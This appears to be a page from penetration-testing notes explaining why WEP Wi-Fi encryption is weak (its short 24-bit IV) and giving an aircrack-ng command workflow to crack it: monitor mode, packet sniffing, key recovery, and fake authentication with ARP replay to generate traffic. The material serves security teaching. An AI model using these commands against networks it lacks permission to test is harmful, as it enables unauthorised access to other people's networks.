WEP

Wired Equivalent Privacy (WEP) is an older security protocol used to secure Wi-Fi networks. However, it is now considered highly insecure and outdated due to several critical flaws.

An Initialization Vector (IV) is added to the shared secret key/password to produce a different Key Stream for each packet. The problem is that the IV is only 24 bits, which can result in collisions.

IV + Secret Key = Key Stream

Key Steam + Packet = Encrypted Packet

WEP appends the IV in plain text in front of the Encrypted Packet so that the router can use it to decrypt the packet. Sniffing network traffic can allow us to determine the key stream when the IV repeats.

Note that these attacks were done using a Wi-Fi adapter such as this Alfa Wi-Fi Adapter.

Setup

## Kill processes that may interfere with monitor mode
airmon-ng check kill

## Start Monitor Mode
airmon-ng start [network interface]

Exploit

## Sniff packets on a specific BSSID and save to a file for analysis
airodump-ng [interface] --bssid [bssid] --channel [channel] --write [output file]

## Analyze airodump-ng output to find the keystream
aircrack-ng [airodump.cap file]

If the WEP network isn't generating enough IVs, you can associate your Wi-Fi hacking device to capture and re-transmit ARP traffic to generate new IVs while sniffing traffic.

## Associate your wireless adapter with the target AP
aireplay-ng --fakeauth [time interval] -a [target bssid>] -h [interface bssid] [interface]

## Capture an ARP packet in the network and re-transmit it to create network traffic
aireplay-ng --arpreplay -b [target bssid] -h [interface bssid] [interface]
PreviousWi-FiNextWPS

Last updated